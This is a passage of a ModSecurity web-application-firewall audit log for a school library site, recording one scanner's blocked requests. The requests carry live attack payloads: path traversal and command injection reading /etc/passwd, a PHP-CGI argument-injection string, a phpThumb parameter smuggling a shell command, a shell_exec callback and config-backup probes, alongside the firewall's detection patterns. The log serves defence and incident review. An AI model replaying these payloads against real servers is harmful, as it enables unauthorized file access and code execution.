/php/download.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274906 --51f83b2b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --51f83b2b-E-- --51f83b2b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/download.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172836720002 1483 (- - -) Stopwatch2: 1747172836720002 1483; combined=408, p1=298, p2=87, p3=0, p4=0, p5=23, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51f83b2b-Z-- --220bcc08-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u9AAAAMI 103.236.140.4 49162 103.236.140.4 8181 --220bcc08-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875290 --220bcc08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --220bcc08-E-- --220bcc08-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172836919374 1402 (- - -) Stopwatch2: 1747172836919374 1402; combined=435, p1=316, p2=92, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --220bcc08-Z-- --a6a8be4c-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u9QAAAMQ 103.236.140.4 49162 103.236.140.4 8181 --a6a8be4c-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274909 --a6a8be4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6a8be4c-E-- --a6a8be4c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837117775 1601 (- - -) Stopwatch2: 1747172837117775 1601; combined=460, p1=340, p2=93, p3=0, p4=0, p5=26, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6a8be4c-Z-- --14e48225-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u9gAAAMM 103.236.140.4 49162 103.236.140.4 8181 --14e48225-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875293 --14e48225-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14e48225-E-- --14e48225-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837316410 1666 (- - -) Stopwatch2: 1747172837316410 1666; combined=461, p1=342, p2=93, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14e48225-Z-- --476d246c-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u9wAAAMU 103.236.140.4 49162 103.236.140.4 8181 --476d246c-B-- GET /download.php?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274912 --476d246c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --476d246c-E-- --476d246c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837514657 1565 (- - -) Stopwatch2: 1747172837514657 1565; combined=446, p1=335, p2=85, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476d246c-Z-- --ae778c5b-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u-AAAAMY 103.236.140.4 49162 103.236.140.4 8181 --ae778c5b-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875296 --ae778c5b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae778c5b-E-- --ae778c5b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837713015 1689 (- - -) Stopwatch2: 1747172837713015 1689; combined=499, p1=381, p2=93, p3=0, p4=0, p5=25, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae778c5b-Z-- --b3e74539-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u-QAAAMc 103.236.140.4 49162 103.236.140.4 8181 --b3e74539-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274915 --b3e74539-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b3e74539-E-- --b3e74539-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837911817 1639 (- - -) Stopwatch2: 1747172837911817 1639; combined=457, p1=341, p2=90, p3=0, p4=0, p5=26, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3e74539-Z-- --4b8d6e6e-A-- [14/May/2025:04:49:39 +0700] aCO-c8abX6K9rhby1vhLogAAAJI 103.236.140.4 50622 103.236.140.4 8181 --4b8d6e6e-B-- GET /config.inc.php.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147275972 --4b8d6e6e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b8d6e6e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172979675828 2041 (- - -) Stopwatch2: 1747172979675828 2041; combined=801, p1=350, p2=425, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b8d6e6e-Z-- --061e3c12-A-- [14/May/2025:04:49:40 +0700] aCO-dMabX6K9rhby1vhLpAAAAJU 103.236.140.4 50622 103.236.140.4 8181 --061e3c12-B-- GET /config.inc.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147275975 --061e3c12-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --061e3c12-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172980075480 1831 (- - -) Stopwatch2: 1747172980075480 1831; combined=707, p1=338, p2=343, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --061e3c12-Z-- --9629b048-A-- [14/May/2025:04:49:41 +0700] aCO-dcabX6K9rhby1vhLqwAAAIQ 103.236.140.4 50622 103.236.140.4 8181 --9629b048-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876370 --9629b048-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9629b048-E-- --9629b048-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172981485137 2993 (- - -) Stopwatch2: 1747172981485137 2993; combined=1792, p1=391, p2=1374, p3=0, p4=0, p5=27, sr=103, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9629b048-Z-- --5775c853-A-- [14/May/2025:04:49:42 +0700] aCO-dsabX6K9rhby1vhLrwAAAIg 103.236.140.4 50622 103.236.140.4 8181 --5775c853-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876376 --5775c853-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5775c853-E-- --5775c853-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172982481034 1815 (- - -) Stopwatch2: 1747172982481034 1815; combined=633, p1=386, p2=210, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5775c853-Z-- --60f04a3c-A-- [14/May/2025:04:49:44 +0700] aCO-eMabX6K9rhby1vhLtwAAAI8 103.236.140.4 50622 103.236.140.4 8181 --60f04a3c-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876388 --60f04a3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --60f04a3c-E-- --60f04a3c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172984084956 1735 (- - -) Stopwatch2: 1747172984084956 1735; combined=583, p1=407, p2=141, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60f04a3c-Z-- --fa6c091b-A-- [14/May/2025:04:49:44 +0700] aCO-eMabX6K9rhby1vhLugAAAJQ 103.236.140.4 50622 103.236.140.4 8181 --fa6c091b-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876394 --fa6c091b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fa6c091b-E-- --fa6c091b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172984878851 1668 (- - -) Stopwatch2: 1747172984878851 1668; combined=521, p1=346, p2=142, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa6c091b-Z-- --ad6a0b32-A-- [14/May/2025:04:49:45 +0700] aCO-ecabX6K9rhby1vhLvQAAAJU 103.236.140.4 50622 103.236.140.4 8181 --ad6a0b32-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276013 --ad6a0b32-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad6a0b32-E-- --ad6a0b32-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file 